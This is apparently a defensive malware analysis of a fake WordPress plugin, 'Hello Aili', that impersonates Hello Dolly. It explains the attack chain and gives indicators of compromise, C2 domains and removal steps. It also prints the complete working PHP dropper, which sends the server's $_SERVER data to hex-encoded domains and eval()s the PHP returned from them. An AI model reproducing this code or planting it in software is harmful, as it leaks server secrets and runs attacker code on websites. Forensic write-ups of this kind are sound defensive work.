Technical Analysis
The 'Hello Aili' plugin masquerades as the legitimate Hello Dolly plugin but contains malicious code that executes on both the admin and frontend. The function 'open_hello()' sends the server's data to a list of associated domains, from which it downloads and executes a PHP payload using 'eval()', resulting in the dynamic generation of spam pages.
VirusTotal Analysis: π‘οΈ Zero-Day / Fully Undetected.
Attack Chain
- Step 1: Plugin 'Hello Aili' is installed in the '/wp-content/plugins/hellos/' directory.
- Step 2: The 'open_hello()' function is triggered through 'admin_init' or directly when the site is loaded.
- Step 3: Server environment data is encoded to a 'User-Agent' header and sent to predefined domains.
- Step 4: A PHP payload is retrieved from these domains and executed via 'eval()', generating SEO spam pages.
Code Signature(s)
FILE: hello.php
<?php
/**
* @package Hello_Joy
* @version 1.7.2
*/
/*
Plugin Name: Hello Aili
Plugin URI: http://wordpress.org/plugins/hello-dolly/
Description: This is not just a plugin, it symbolizes the hope and enthusiasm of an entire generation summed up in two words sung most famously by Louis Armstrong: Hello, Dolly. When activated you will randomly see a lyric from <cite>Hello, Dolly</cite> in the upper right of your admin screen on every page.
Author: Matt Mullenweg
Version: 1.7.2
Author URI: http://ma.tt/
*/
add_action('admin_init', "open_hello");
if (!is_admin()) {
open_hello();
}
function open_hello()
{
$args = array(
'timeout' => 15,
'headers' => array(
"User-Agent" => json_encode($_SERVER),
),
);
$ids =array(
'76312e73616c65736275792e7275',
'76312e64696373616c652e7275',
'76312e61616263642e7275',
'616b627676696473652e73686f70'
);
foreach ($ids as $hex) {
$id = hex2bin($hex);
$response = wp_remote_get("http://" . $id , $args);
if (!is_wp_error($response) && 200 === wp_remote_retrieve_response_code($response)) {
return eval($response['body']);
}
}
}
π File System Indicators
-
Malicious Path:
/wp-content/plugins/hellos/ -
Malicious File:
/wp-content/plugins/hellos/hellos.php(Masquerading as "Hello Dolly") -
Fake Metadata: Plugin Name header reading
Hello Ailibut using "Matt Mullenweg" as the author.
π Network Indicators (C2 Domains)
Block these domains in your firewall or hosts file:
v1.salesbuy.ruv1.dicsale.ruv1.aabcd.ruakbvvidsse.shop
𧬠Code Signatures (Forensic Search)
Search your codebase or database for these specific strings:
1. Malicious Function Name: function open_hello()
2. Hex-Encoded C2 Signatures (High Fidelity):Search for these strings to find the dropper even if they change the domain names:
-
76312e73616c65736275792e7275(Decodes to v1.salesbuy.ru) -
76312e64696373616c652e7275(Decodes to v1.dicsale.ru) -
616b627676696473652e73686f70(Decodes to akbvvidsse.shop)
3. Spam URL Pattern:
- Query parameters matching
?a=[0-9]+(e.g.,?a=117728283373) - Query parameters matching
?r=[0-9]+
Removal Protocol
- Step 1: Delete the '/wp-content/plugins/hellos/' directory.
- Step 2: Purge the website cache to clear any residual spam content.
- Step 3: Conduct a full database scan for persistent malicious hooks or changes.
Status: Active Threat.
Verification: Verified by MD Pabel.
Top comments (0)